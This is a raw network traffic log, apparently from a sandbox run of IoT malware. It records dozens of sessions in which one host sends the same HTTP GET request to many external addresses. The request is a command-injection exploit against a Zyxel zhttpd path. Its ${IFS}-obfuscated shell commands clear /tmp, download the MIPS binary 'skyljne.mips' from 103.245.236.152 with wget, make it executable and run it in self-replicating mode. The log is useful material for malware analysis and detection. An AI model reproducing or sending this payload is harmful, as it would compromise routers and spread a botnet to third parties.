                                            Jan 14, 2024 15:50:46.574235916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6343192.168.2.2356114172.251.170.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574261904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6344192.168.2.2343250139.13.27.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574295044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6345192.168.2.2353358122.160.83.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574321985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6346192.168.2.2335774176.224.227.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574350119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6347192.168.2.235873024.142.255.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574379921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6348192.168.2.235147451.137.66.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574409962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6349192.168.2.234459099.219.172.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574444056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6350192.168.2.234459693.225.90.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574465990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6351192.168.2.2359178122.217.231.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574503899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6352192.168.2.2344314211.59.212.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574532032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6353192.168.2.235990664.143.16.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574563026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6354192.168.2.2341534122.117.189.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574599028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6355192.168.2.2350686110.225.98.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574632883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6356192.168.2.2358706171.169.162.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574660063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6357192.168.2.2341982176.158.39.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574678898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6358192.168.2.2356024144.197.17.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574703932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6359192.168.2.2341520109.38.31.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574712038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6360192.168.2.235042843.83.141.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574769974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6361192.168.2.2344414220.226.59.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574803114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6362192.168.2.2343472109.182.212.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574840069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6363192.168.2.2344170115.84.31.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574855089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6364192.168.2.233959847.158.94.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574892998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6365192.168.2.235414618.189.193.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574892998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6366192.168.2.2353094103.198.49.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574929953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6367192.168.2.235430457.49.224.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574969053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6368192.168.2.2336608156.46.77.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574991941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6369192.168.2.2344678107.127.248.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.575010061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6370192.168.2.2335696129.72.112.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.575077057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6371192.168.2.2358290170.251.143.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.575092077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6372192.168.2.235877282.253.242.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.575114012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6373192.168.2.2337124193.92.4.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.577608109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6374192.168.2.2348494115.184.120.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.578003883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6375192.168.2.2359076169.116.248.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.578011990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6376192.168.2.2358432179.49.135.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.578071117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6377192.168.2.2348638133.231.175.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.578099966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6378192.168.2.2353236216.161.114.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.578140020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6379192.168.2.2344402170.132.133.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.578151941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6380192.168.2.234797234.212.228.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.578172922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6381192.168.2.2358912158.69.150.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.578238010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6382192.168.2.2336794123.231.8.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.578258038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6383192.168.2.2359140189.10.40.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589268923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6384192.168.2.2352608207.126.10.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589281082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6385192.168.2.2354222153.75.54.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589294910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6386192.168.2.2334772204.228.139.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589359045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6387192.168.2.2357652164.253.147.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589365959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6388192.168.2.2347662195.111.32.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589386940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6389192.168.2.235791286.228.154.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589423895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6390192.168.2.233569878.103.109.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589471102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6391192.168.2.234242059.22.237.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589483976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6392192.168.2.235985062.71.147.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589489937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6393192.168.2.234728042.180.48.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589545012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6394192.168.2.2337334135.42.26.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589584112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6395192.168.2.2337498158.167.108.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589617014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6396192.168.2.2346664197.248.74.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589647055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6397192.168.2.2333354198.21.26.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589663029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6398192.168.2.234872870.239.133.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589704990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6399192.168.2.234932461.102.251.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589737892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6400192.168.2.2360304172.131.208.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589761972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6401192.168.2.235899288.51.55.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589777946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6402192.168.2.235817638.75.32.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589833975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6403192.168.2.235803442.45.226.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589838982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6404192.168.2.23528044.249.201.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589859962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6405192.168.2.234231483.162.159.120443
                                            TimestampBytes transferredDirectionData
